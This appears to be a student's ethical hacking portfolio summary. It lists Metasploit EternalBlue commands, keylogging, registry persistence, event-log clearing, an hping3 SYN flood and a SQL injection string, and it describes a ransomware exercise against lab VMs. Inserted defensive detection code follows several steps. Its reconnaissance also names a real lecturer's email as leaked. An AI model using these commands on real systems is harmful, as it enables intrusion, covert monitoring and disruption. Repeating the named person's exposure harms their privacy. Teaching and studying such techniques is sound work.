Kalaichelvan Thieveshkar
Staffordshire University | COMP50009 - Ethical Hacking
Key Differences:

| Aspect | Passive Gathering | Active Gathering |
|---|---|---|
| Target Interaction | No direct contact | Direct system interaction |
| Detection Risk | Low (undetectable) | High (triggers security systems) |
| Data Sources | Public databases, DNS, WHOIS | Port scanning, banner grabbing |
| Legal Considerations | Generally permissible | Requires explicit authorization |

Passive Techniques Demonstrated on www.apiit.lk:
- WHOIS Lookup
  - Registrar: APIIT Sri Lanka
  - Nameservers: SLT-managed (p1.ns.slt.lk)
  - IP: 217.21.91.138 (shared hosting, 45+ sites)
  - Location: Hostinger, India (ASN AS47583)
  - Screenshot: Page 9
- DNSDumpster
  - 15 subdomains across 3 locations: Sri Lanka (9), USA (4), Singapore (2)
  - Critical services: alms.apiit.lk (AWS Singapore), eclub.apiit.lk (WordPress 6.6.2)
  - Screenshot: Pages 11-14
- Google Dorking
  - Exposed documents located with the query `site:apiit.lk filetype:pdf`
  - Found: library rules, staff brochures, sponsorship documents
  - Screenshot: Pages 16-20
- HTML/REST API Analysis
  - WordPress 6.6.2 + Elementor 3.23.4
  - Vulnerable endpoints disclosed in page source: `<link rel="alternate" href="https://apiit.lk/wp-json/oembed/1.0/embed">`
  - Screenshot: Pages 21-23
- Pastebin Monitoring
  - Credential leak: jina@apiit.lk (Lecturer), verified via HaveIBeenPwned
  - Screenshot: Page 20
Active Reconnaissance (Nmap):
- Attacker setup: Kali Linux VM (192.168.35.135)
- Target: Windows Server 2008 VM (192.168.35.136)

```bash
# Service Version Detection
nmap -sV 192.168.35.136
# OS Detection
nmap -O 192.168.35.136
# Vulnerability Scanning
nmap --script=vuln 192.168.35.136
```

- Full scan summary table: Page 50
- Screenshots: Pages 39-49
Vulnerabilities Identified:

| Vulnerability | Severity | Root Cause | Real-World Incident |
|---|---|---|---|
| MS17-010 (EternalBlue) | Critical | SMBv1 protocol flaw | WannaCry ransomware (2017) |
| Unsupported OS | Critical | Windows Server 2008 EOL | NotPetya attacks (2017) |
| SMB Signing Disabled | High | Missing message authentication | MITM attacks |

- Nessus report: Pages 54-58
- Countermeasures documented: Pages 60-63
Exploitation (MS17-010 EternalBlue):

```
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.35.136
set LHOST 192.168.35.135
exploit
```

Verification:
- Created folder Thieveshkar_cb013248 on the victim desktop; screenshot captured via Meterpreter (Page 35)
- Full exploit sequence: Pages 29-36
Post-Exploitation Techniques:

Keylogging (Meterpreter):

```
keyscan_start   # Begin capturing keystrokes
keyscan_dump    # Retrieve captured data
```

- Screenshot: Pages 71-73
Persistence Backdoor:

```
use exploit/windows/local/persistence
set STARTUP USER
exploit
```

- Installed VBS script in startup registry
- Screenshots: Pages 74-78
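Added example, not part of the report: a defender-side check for the kind of artefact the persistence step leaves behind, namely a Run-key value that launches a script host on a VBS file from a user-writable path. The registry export is constructed sample data in .reg syntax, and the signal names, regexes and ranking are this example's own assumptions rather than any tool's.

```python
import re

# Constructed registry export in .reg syntax (sample data, not an artefact from the report).
# The "Updater" value mimics a script-host launcher pointing at a VBS file in a temp folder.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\labuser\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Updater"="wscript.exe //B \"C:\\Users\\labuser\\AppData\\Local\\Temp\\svc_update.vbs\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
'''

SECTION_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')  # "name"="string value"
AUTORUN_KEY = re.compile(r"\\CurrentVersion\\(Run|RunOnce)$", re.IGNORECASE)
SCRIPT_HOST = re.compile(r"\b(wscript|cscript|mshta|powershell)(\.exe)?\b", re.IGNORECASE)
SCRIPT_FILE = re.compile(r"\.(vbs|vbe|js|jse|ps1|bat|cmd|hta)\b", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads)\\", re.IGNORECASE)


def unescape(value):
    # In .reg strings a backslash escapes the following character (doubled backslash, escaped quote).
    return re.sub(r"\\(.)", r"\1", value)


def parse_reg(text):
    """Yield (key path, value name, value data) for every string value in the export."""
    section = None
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if m and section:
            yield section, unescape(m.group(1)), unescape(m.group(2))


def find_suspicious_autoruns(text):
    """Score every Run/RunOnce value; return findings sorted by number of matching signals."""
    findings = []
    for key, name, command in parse_reg(text):
        if not AUTORUN_KEY.search(key):
            continue  # only autostart locations are of interest here
        reasons = []
        if SCRIPT_HOST.search(command):
            reasons.append("launches a script host")
        if SCRIPT_FILE.search(command):
            reasons.append("runs a script file")
        if USER_WRITABLE.search(command):
            reasons.append("path is user-writable")
        if reasons:
            findings.append({"key": key, "name": name, "command": command, "reasons": reasons})
    return sorted(findings, key=lambda f: len(f["reasons"]), reverse=True)


if __name__ == "__main__":
    for finding in find_suspicious_autoruns(SAMPLE_REG):
        print(finding["name"], "->", finding["command"], "|", ", ".join(finding["reasons"]))
```

Ranking by the number of signals matters for triage: the legitimate OneDrive entry is flagged on the user-writable path alone, while the script-host launcher trips all three. A single signal is a lead to verify, not a verdict.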
Covering Tracks:
- Cleared logs:

```
wevtutil cl Security
wevtutil cl System
wevtutil cl Application
```

- Deleted evidence file:

```
del C:\Users\Thieveshkar\Desktop\Thieveshkar.txt
```

- Screenshots: Pages 79-97
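Added example, not from the report: detection logic for the log-clearing step, run over constructed Windows event records. The JSON field names are this example's own stand-in for a SIEM schema; the event IDs are the ones Windows itself writes when a log is cleared (1102 in the Security log, 104 in the System log) plus process creation (4688), which carries the command line only when command-line auditing is enabled.

```python
import json
import re

# Constructed sample of Windows event records as JSON lines (not from the report's
# screenshots). Field names are this example's own, not a real SIEM schema.
SAMPLE_EVENTS = """\
{"time": "2024-03-01T10:00:01", "channel": "Security", "event_id": 4624, "data": {"user": "labuser"}}
{"time": "2024-03-01T10:05:12", "channel": "Security", "event_id": 4688, "data": {"command_line": "wevtutil.exe cl Security"}}
{"time": "2024-03-01T10:05:13", "channel": "Security", "event_id": 1102, "data": {"user": "labuser"}}
{"time": "2024-03-01T10:05:14", "channel": "System", "event_id": 104, "data": {"user": "labuser", "log": "System"}}
{"time": "2024-03-01T10:05:15", "channel": "System", "event_id": 104, "data": {"user": "labuser", "log": "Application"}}
{"time": "2024-03-01T10:06:00", "channel": "Application", "event_id": 1000, "data": {}}
"""

# Events Windows writes when a log is cleared: 1102 is the first record in the freshly
# cleared Security log; 104 goes to the System log for the other channels.
LOG_CLEAR_EVENTS = {
    ("Security", 1102): "Security audit log cleared",
    ("System", 104): "event log cleared",
}

# Process-creation command lines (event 4688 with command-line auditing on) that
# invoke wevtutil's clear-log verb in either spelling.
WEVTUTIL_CLEAR = re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.IGNORECASE)


def detect_log_clearing(jsonl_text):
    """Return (time, event_id, description) for every record indicating log clearing."""
    alerts = []
    for line in jsonl_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        key = (ev["channel"], ev["event_id"])
        if key in LOG_CLEAR_EVENTS:
            log = ev["data"].get("log", ev["channel"])
            alerts.append((ev["time"], ev["event_id"], f"{LOG_CLEAR_EVENTS[key]} ({log})"))
        elif ev["event_id"] == 4688 and WEVTUTIL_CLEAR.search(ev["data"].get("command_line", "")):
            alerts.append((ev["time"], 4688, "wevtutil clear-log executed"))
    return alerts


if __name__ == "__main__":
    for alert in detect_log_clearing(SAMPLE_EVENTS):
        print(*alert)
```

The 1102 record survives the clearing because Windows writes it into the emptied log, so the action is self-documenting; three clear events within seconds of each other is a strong signal on its own. Forwarding events to a collector as they are written is the countermeasure that makes local clearing ineffective.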
Phishing Attack:

Methodology:

```mermaid
graph LR
A[Attacker] --> B[Create Fake WordPress Login]
B --> C[Victim Enters Credentials]
C --> D[Credentials Stolen]
```

Tools: SocioPhish
Countermeasures:
- Multi-Factor Authentication (blocks 99% of attacks - Kalina & Sundaram, 2023)
- AI Email Filtering (99.6% accuracy - Ahmed et al., 2024)
Screenshots: Pages 98-105
DDoS Attack:

Methodology:

```mermaid
graph TB
A[Botnet] --> B[Flood Target Server]
B --> C[Server Overload]
C --> D[Service Disruption]
```

Tool: hping3 SYN flood

```bash
sudo hping3 -S --flood -p 445 192.168.35.136
```

Countermeasures:
- ML-based detection (XGBoost/CNN - Azadeh Golduzian, 2023)
- SDN traffic analysis (Wang et al.)
Screenshots: Pages 108-113
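Added example (not from the report) that covers both the Nmap scanning step in the active reconnaissance section and the hping3 SYN flood here: a per-source detector run over constructed packet records. The record format, the thresholds and the sample traffic are this example's own assumptions; in practice the records would come from a firewall or sensor log.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One record per TCP packet: "<ISO time> <src> -> <dst>:<port> <flags>" (this example's
# own format, standing in for a firewall or sensor log).
LINE_RE = re.compile(r"^(\S+) (\S+) -> (\S+):(\d+) (\w+)$")


def build_sample():
    """Constructed traffic: a benign client, a 30-port scan, and an hping3-style SYN flood."""
    base = datetime(2024, 3, 1, 10, 0, 0)
    lines = []
    for i in range(3):  # benign: three connections to 443, seconds apart
        t = base + timedelta(seconds=5 * i)
        lines.append(f"{t.isoformat()} 10.0.0.9 -> 192.168.35.136:443 S")
    for port in range(1, 31):  # scan: one new port every 300 ms
        t = base + timedelta(milliseconds=300 * port)
        lines.append(f"{t.isoformat()} 10.0.0.5 -> 192.168.35.136:{port} S")
    for i in range(150):  # flood: 150 SYNs to port 445 inside half a second
        t = base + timedelta(seconds=20, milliseconds=3 * i)
        lines.append(f"{t.isoformat()} 192.168.35.135 -> 192.168.35.136:445 S")
    return "\n".join(lines)


def detect(text, flood_syn_per_sec=100, scan_min_ports=20, scan_window=timedelta(seconds=60)):
    """Return {src: description} for sources whose SYN pattern looks like a flood or a scan."""
    syn_per_second = defaultdict(lambda: defaultdict(int))  # src -> second -> SYN count
    first_seen_port = defaultdict(dict)                      # src -> port -> first SYN time
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m.group(5) != "S":  # only bare SYNs (connection attempts) count
            continue
        ts, src, port = datetime.fromisoformat(m.group(1)), m.group(2), int(m.group(4))
        syn_per_second[src][ts.replace(microsecond=0)] += 1
        first_seen_port[src].setdefault(port, ts)

    alerts = {}
    for src, buckets in syn_per_second.items():
        peak = max(buckets.values())
        if peak > flood_syn_per_sec:  # volume signal: too many SYNs in one second
            alerts[src] = f"SYN flood: peak {peak} SYN/s"
    for src, ports in first_seen_port.items():
        times = sorted(ports.values())
        span = times[-1] - times[0]
        if len(ports) >= scan_min_ports and span <= scan_window:  # fan-out signal
            alerts.setdefault(src, f"port scan: {len(ports)} ports in {span.total_seconds():.1f}s")
    return alerts


if __name__ == "__main__":
    for src, why in detect(build_sample()).items():
        print(src, why)
```

The two signals are deliberately different: a scan is many distinct ports from one source at a modest rate, a flood is a very high rate towards few ports. Per-source counting is blind to a flood that randomises its source addresses (hping3 has a `--rand-source` option), so a production detector also aggregates SYN rate per destination port and compares it with the half-open connection backlog.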
SQL Injection Attack:

Methodology:

```mermaid
graph LR
A[Malicious Input] --> B[Unsanitized Query]
B --> C[Database Compromise]
```

Techniques:
- Manual: `1' OR '1'='1` input (Page 118)
- Automated: SQLMap database dump (Pages 119-122)
Countermeasures:
- Parameterized queries
- ModSec-AdvLearn WAF (Floris et al., 2023)
Screenshots: Pages 114-124
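Added example (not code from the report): the manual payload above run against a string-built query, beside the parameterized form the report lists as a countermeasure. It uses Python's built-in sqlite3 module with a constructed two-row user table; the function names are this example's own.

```python
import sqlite3

PAYLOAD = "1' OR '1'='1"  # the manual injection string used in the report


def make_db():
    """Constructed in-memory user table so the example runs offline (sample data, not the lab's).
    Passwords are stored in clear only to keep the example short; real systems store salted hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "correct-horse"), ("bob", "battery-staple")])
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by string formatting, so the input becomes SQL syntax.
    With PAYLOAD in both fields the statement reads:
      ... WHERE username = '1' OR '1'='1' AND password = '1' OR '1'='1'
    and the trailing OR '1'='1' makes the WHERE clause true for every row."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return sorted(row[0] for row in conn.execute(query))


def login_parameterized(conn, username, password):
    """Passes values through placeholders: the driver binds them as data, never as syntax,
    so the quotes in PAYLOAD are compared literally against the stored column."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(query, (username, password)))


def demo():
    """Run a legitimate login and the payload through both implementations."""
    conn = make_db()
    return {
        "legitimate": login_parameterized(conn, "alice", "correct-horse"),
        "vulnerable": login_vulnerable(conn, PAYLOAD, PAYLOAD),
        "parameterized": login_parameterized(conn, PAYLOAD, PAYLOAD),
    }


if __name__ == "__main__":
    for case, users in demo().items():
        print(f"{case}: {users}")
```

The contrast is the whole point of the countermeasure: the vulnerable version returns every account because the payload rewrites the query's logic, while the parameterized version returns nothing because no account literally has `1' OR '1'='1` as both username and password. Escaping or filtering quotes is not a substitute; binding parameters removes the parsing step that the injection depends on.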
Ransomware Attack:

Methodology:

```mermaid
graph TB
A[MSFVenom Payload] --> B[Social Engineering]
B --> C[Victim Execution]
C --> D[File Encryption]
D --> E[Ransom Note]
```

Execution:
- Created malicious payload
- Sent via spoofed IT department email
- Encrypted desktop files
Screenshots: Pages 125-134
This portfolio demonstrates comprehensive ethical hacking techniques aligned with module requirements:
- Executed 5 passive reconnaissance methods
- Exploited critical vulnerabilities (EternalBlue)
- Demonstrated 4 cyber attacks with countermeasures
- Included identity-verified screenshots throughout
- Referenced 10+ academic sources (2023-2024)
Full 136-page report: PDF Download
References:
- Kalina, P., & Sundaram, D. (2023). Effectiveness of MFA Against Phishing.
- Ahmed, M., et al. (2024). PhishSentry: AI-Driven Email Detection.
- Floris, G., et al. (2023). ModSec-AdvLearn: Adversarial SQL Injection Defense.
- Golduzian, A. (2023). Predicting DDoS with Machine Learning.
Full references: Pages 135-136
Disclaimer: All activities were performed in a controlled lab environment with written authorization. No real systems were compromised.